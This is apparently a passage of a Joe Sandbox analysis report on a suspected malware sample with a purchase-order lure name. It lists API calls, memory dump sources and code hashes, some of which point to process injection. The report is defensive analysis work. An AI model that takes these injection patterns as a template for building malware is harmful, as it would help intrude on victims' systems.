                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                • String ID: (F$8E
                                • API String ID: 1986988660-3121805947
                                • Opcode ID: 2054f7988b704262271a2bdcbc1e2a08f23171d050befb70204785570737961e
                                • Instruction ID: b7e3722a0c2ae6b87b1220d582af9d9f125d0cca09defd9e3b1e8167a2f9fc4c
                                • Opcode Fuzzy Hash: 2054f7988b704262271a2bdcbc1e2a08f23171d050befb70204785570737961e
                                • Instruction Fuzzy Hash: 4171D1B4811244BED7A4EFF9BD89E553AE0BBB834439462BAD41ACB261E7344437CF41

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 036DF700: Sleep.KERNELBASE(000001F4), ref: 036DF711
                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036DF938
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFileSleep
                                • String ID: X82E5RR84F7XNHHKAB00KDRAYZ3UO
                                • API String ID: 2694422964-640551944
                                • Opcode ID: c9dce6770700ac2193a911e95f968c3c33fb0004a5b7898994eb4ce5363c6188
                                • Instruction ID: 0678dd614776eed3f236892a1040bca67ec6e7337378afee6d5f083e0fe7c223
                                • Opcode Fuzzy Hash: c9dce6770700ac2193a911e95f968c3c33fb0004a5b7898994eb4ce5363c6188
                                • Instruction Fuzzy Hash: 58514171D04388EAEF12D7B4C858BDEBB78AF15304F044199E6497B2C1CBB91B49CBA5

                                Control-flow Graph

                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00153B0F,SwapMouseButtons,00000004,?), ref: 00153B40
                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00153B0F,SwapMouseButtons,00000004,?), ref: 00153B61
                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00153B0F,SwapMouseButtons,00000004,?), ref: 00153B83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Control Panel\Mouse
                                • API String ID: 3677997916-824357125
                                • Opcode ID: f48dbbc770470e6fda1ec9a14b0e8887d808ae09f95cbef7ccf183ce99fb5b9c
                                • Instruction ID: f0334f4aea488dab96224e12e8b01e6d658bb8a024b8cbc38965afd9d38cb95c
                                • Opcode Fuzzy Hash: f48dbbc770470e6fda1ec9a14b0e8887d808ae09f95cbef7ccf183ce99fb5b9c
                                • Instruction Fuzzy Hash: F1112AB5510218FFDB21CFA5DC84AAEB7B8EF44785B104459F825DB110D3319F4597A0

                                Control-flow Graph

                                APIs
                                • CreateProcessW.KERNELBASE(?,00000000), ref: 036DEEBB
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036DEF51
                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036DEF73
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                • Instruction ID: aec35234898b3b54ed40be4acaf88b00d3571f69c23672d9f106be8c37b842af
                                • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                • Instruction Fuzzy Hash: 4062F934E142589BEB24CFA4C850BDEB776EF58300F1091A9D10DEB394E77A9E81CB59
                                APIs
                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001933A2
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00153A04
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: IconLoadNotifyShell_String_wcslen
                                • String ID: Line:
                                • API String ID: 2289894680-1585850449
                                • Opcode ID: 1ec27b45286659e3d68c3ffefd5b50a82124f61a1e9dcf8a6d5926ca6021d623
                                • Instruction ID: 45db604e97f9be54285074f500d90cd7ba81e5562891da5f36c691529aec36c2
                                • Opcode Fuzzy Hash: 1ec27b45286659e3d68c3ffefd5b50a82124f61a1e9dcf8a6d5926ca6021d623
                                • Instruction Fuzzy Hash: B031D071408304EAC725EB60EC45FEBB7E8AB64355F00496AF9B98B091DB70965DC7C2
                                APIs
                                • GetOpenFileNameW.COMDLG32(?), ref: 00192C8C
                                  • Part of subcall function 00153AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00153A97,?,?,00152E7F,?,?,?,00000000), ref: 00153AC2
                                  • Part of subcall function 00152DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00152DC4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Name$Path$FileFullLongOpen
                                • String ID: X$`e!
                                • API String ID: 779396738-4247064546
                                • Opcode ID: b61e56b9f93613f5df470afa4b12179bcfd770656f9c41f8629f370578f00c78
                                • Instruction ID: 23da9e6a72118012514a764e8b9dee6ff7fd8b9a096deeb11fa974ccc1de7399
                                • Opcode Fuzzy Hash: b61e56b9f93613f5df470afa4b12179bcfd770656f9c41f8629f370578f00c78
                                • Instruction Fuzzy Hash: 4F21C671A10258AFDF01DF94C849BEE7BF8AF59305F004059E815AB241DBB4558DCBA1
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00170668
                                  • Part of subcall function 001732A4: RaiseException.KERNEL32(?,?,?,0017068A,?,00221444,?,?,?,?,?,?,0017068A,00151129,00218738,00151129), ref: 00173304
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00170685
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Exception@8Throw$ExceptionRaise
                                • String ID: Unknown exception
                                • API String ID: 3476068407-410509341
                                • Opcode ID: f7f01b169ffec3e30b8ad477875470ea52c77acd4776b2e7664ec09e750eed5e
                                • Instruction ID: db31edd7bda9dbad8db7d786f4887efe2cb9241e137d192a7372764bbf91e7e1
                                • Opcode Fuzzy Hash: f7f01b169ffec3e30b8ad477875470ea52c77acd4776b2e7664ec09e750eed5e
                                • Instruction Fuzzy Hash: 95F0C23490030DB7CB05BAA4EC96C9E7BBC5E64350B60C135B82C965D2EF71EB76C980
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001D82F5
                                • TerminateProcess.KERNEL32(00000000), ref: 001D82FC
                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 001D84DD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$CurrentFreeLibraryTerminate
                                • String ID:
                                • API String ID: 146820519-0
                                • Opcode ID: 911d74d78cc79994a17ab70aacaec80d2a5f841ddf8ee89317924f1190dd7265
                                • Instruction ID: 757195486f09686e86e797024616ed5b770520ee1ef69a45ab9e1ffaa077e586
                                • Opcode Fuzzy Hash: 911d74d78cc79994a17ab70aacaec80d2a5f841ddf8ee89317924f1190dd7265
                                • Instruction Fuzzy Hash: EC125B719083419FC714DF28C484B6ABBE5BF99314F04895EE8998B392DB31E946CB92
                                APIs
                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,001885CC,?,00218CC8,0000000C), ref: 00188704
                                • GetLastError.KERNEL32(?,001885CC,?,00218CC8,0000000C), ref: 0018870E
                                • __dosmaperr.LIBCMT ref: 00188739
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID:
                                • API String ID: 2583163307-0
                                • Opcode ID: fe54fc5881fbe1bb2b9ba0caba8ad4ec6a26aa326cad3875413a445b5667cc96
                                • Instruction ID: e18fbbcb7a22c04552bfd8c4311a74cff24dfe44b4008bbd8a2a9dba4590c955
                                • Opcode Fuzzy Hash: fe54fc5881fbe1bb2b9ba0caba8ad4ec6a26aa326cad3875413a445b5667cc96
                                • Instruction Fuzzy Hash: AA018932A0466026C3347374A889B7E275A9B92774F79011DFC188B1D3EFA0DE828F90
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 001617F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Init_thread_footer
                                • String ID: CALL
                                • API String ID: 1385522511-4196123274
                                • Opcode ID: 6d7db79f3b6404c930a18db847a24aa5cb37f8c2eacfc8d9ad8706a447607976
                                • Instruction ID: e62a7f3171b7e9c9f78c7abf41bc3218ac573b2289cfa89c4ddb93691e861322
                                • Opcode Fuzzy Hash: 6d7db79f3b6404c930a18db847a24aa5cb37f8c2eacfc8d9ad8706a447607976
                                • Instruction Fuzzy Hash: 93229C74608341EFC714DF14C884A2ABBF1BF9A314F19895DF49A8B361D771E865CB82
                                APIs
                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00153908
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: IconNotifyShell_
                                • String ID:
                                • API String ID: 1144537725-0
                                • Opcode ID: bf5512c0029c98896f892e4a8930ac1ae1fbeda0acfdf5a615a9c0a76a8bbe44
                                • Instruction ID: a4d6993749833659bc8b2e26ca2dc6817443b920e4babc63e1648584db71ec1c
                                • Opcode Fuzzy Hash: bf5512c0029c98896f892e4a8930ac1ae1fbeda0acfdf5a615a9c0a76a8bbe44
                                • Instruction Fuzzy Hash: 4C31C370504300DFD721DF64D884B97BBE4FB59349F00096EF9B98B240E771AA58CB52
                                APIs
                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0015949C,?,00008000), ref: 00155773
                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0015949C,?,00008000), ref: 00194052
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: fe784b0afee8b0c68e2a3dd27b28c1b96d28e477fb176ad2ac95b17a822f601e
                                • Instruction ID: 18399e9a5f507f7fe2313f86503f05fec8529435b9f21520834aed59db488917
                                • Opcode Fuzzy Hash: fe784b0afee8b0c68e2a3dd27b28c1b96d28e477fb176ad2ac95b17a822f601e
                                • Instruction Fuzzy Hash: 69018030145225F6E7305A6ACC0EF977F99EF067B1F148200BEAC5E1E1C7B45855CB90
                                APIs
                                • CreateProcessW.KERNELBASE(?,00000000), ref: 036DEEBB
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036DEF51
                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036DEF73
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                • Instruction ID: 4bad635466dc93d63ab96729e3144bf90618e7cdcbd74ec62da603206e4202d5
                                • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                • Instruction Fuzzy Hash: CD12CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4E85CF5A
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction ID: 2fde72b48f03e580a4ba6bbb1022041e7a8e18f57e1c66ff8e0f4b6389d84fd6
                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction Fuzzy Hash: 7431E675A00109DBC718CF59E880969F7A6FF49310B2586A9E809CF655D731EDE2DBC0
                                APIs
                                  • Part of subcall function 00154E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00154EDD,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E9C
                                  • Part of subcall function 00154E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00154EAE
                                  • Part of subcall function 00154E90: FreeLibrary.KERNEL32(00000000,?,?,00154EDD,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154EC0
                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154EFD
                                  • Part of subcall function 00154E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00193CDE,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E62
                                  • Part of subcall function 00154E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00154E74
                                  • Part of subcall function 00154E59: FreeLibrary.KERNEL32(00000000,?,?,00193CDE,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E87
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Library$Load$AddressFreeProc
                                • String ID:
                                • API String ID: 2632591731-0
                                • Opcode ID: f32eeda59d358b207b6d847c99ae75751666db2f49ae4877ae19baa38fbebb68
                                • Instruction ID: 501098067aefdcdbef2e4c27f7a51e3fbaababab33a5ad6c587006d69eddd621
                                • Opcode Fuzzy Hash: f32eeda59d358b207b6d847c99ae75751666db2f49ae4877ae19baa38fbebb68
                                • Instruction Fuzzy Hash: DE112731600205EBCF14AB68DC03FAD77A59F60716F10842EF962AE1C1EF749A899B90
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: __wsopen_s
                                • String ID:
                                • API String ID: 3347428461-0
                                • Opcode ID: 80122547a7aed2b4037712062a4c4b51d6ddb010f8cf338af3cda2cc05d62ff4
                                • Instruction ID: 237f13ae5aae9d315b32253252335dde486ff305c5ad59a887ca06a2d954d51f
                                • Opcode Fuzzy Hash: 80122547a7aed2b4037712062a4c4b51d6ddb010f8cf338af3cda2cc05d62ff4
                                • Instruction Fuzzy Hash: 4C11187690410AAFCF15DF58E945A9A7BF5EF48314F114059FC08AB312DB31EA11CBA5
                                APIs
                                  • Part of subcall function 00184C7D: RtlAllocateHeap.NTDLL(00000008,00151129,00000000,?,00182E29,00000001,00000364,?,?,?,0017F2DE,00183863,00221444,?,0016FDF5,?), ref: 00184CBE
                                • _free.LIBCMT ref: 0018506C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                • Instruction ID: 266b106783a09d40fc3a11361281d71a201ecbff4244b16dab8b766888f416d1
                                • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                • Instruction Fuzzy Hash: 1A0126726047056BE3219E699881A9AFBEDFB89370F25051DF19483280EB30AA05CBB4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                • Instruction ID: 9192162ffa43677d8bf2b1cab57c54a852e11a505a80a1161616c7fa7224d287
                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                • Instruction Fuzzy Hash: F1F0F432510A14A6C7323A699C05B5A33F89F76334F218759F829931D2DB74D9028EA5
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,00151129,00000000,?,00182E29,00000001,00000364,?,?,?,0017F2DE,00183863,00221444,?,0016FDF5,?), ref: 00184CBE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 4186f91697133df72af486308c6d68f2f8b73cec8d19e3f3014b224e4eae5759
                                • Instruction ID: 8db534bfd4602312ff9ad2ea16adc138193b03fff17381b268addba93e7c215b
                                • Opcode Fuzzy Hash: 4186f91697133df72af486308c6d68f2f8b73cec8d19e3f3014b224e4eae5759
                                • Instruction Fuzzy Hash: C3F0E231602226A7DB217F629C09F6B779CBF517B0B158125F819AA281CF30DA019FE0
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 9ef2e33a7c6039a8854e25277eeb00b2972a405547d0d93aa9bd63c05781e6dd
                                • Instruction ID: ca1e5ffeb78cbc3c9f5ffbcdd1f886644a5b74298dc14cf5c30ea4e0e75842e8
                                • Opcode Fuzzy Hash: 9ef2e33a7c6039a8854e25277eeb00b2972a405547d0d93aa9bd63c05781e6dd
                                • Instruction Fuzzy Hash: 24E06531601224A7D63137A69C05B9B3659AB53FB0F1D4225BC39A65D1DB21DF028BE1
                                APIs
